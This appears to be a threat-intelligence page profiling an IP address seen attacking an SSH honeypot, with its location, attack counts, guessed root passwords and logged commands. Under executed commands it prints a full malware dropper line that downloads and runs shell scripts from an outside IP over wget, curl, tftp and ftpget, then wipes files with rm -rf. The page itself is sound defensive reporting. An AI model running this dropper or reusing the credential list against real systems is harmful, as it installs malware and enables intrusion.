Active ThreatMEDIUM

45.156.87.204

Country of Origin🇳🇱 Netherlands
First Detection1/8/2026
Last Activity1/12/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
341
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
3
Malware

Geolocation

Country
🇳🇱 Netherlands
City
Eygelshoven
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

🔐root/root
6x
🔐root/admin
4x
🔐root/admin12345
2x
🔐root/root123
2x
🔐root/YYY@123
1x
🔐root/JJJ@123
1x
🔐root/kshkshsk
1x
🔐root/MM@123
1x
🔐root/Qwerty111
1x
🔐root/OO@123
1x
🔐root/UUU@123
1x
🔐root/BB@123
1x
🔐root/VV@123
1x
🔐root/TT@123
1x
🔐root/LLL@123
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.174/1.sh; curl -O http://202.1.31.174/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.174 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.174; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.174 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *2x
$history | tail -51x
$ssh -V1x

Risk Assessment

57
/100
LowMediumHighCritical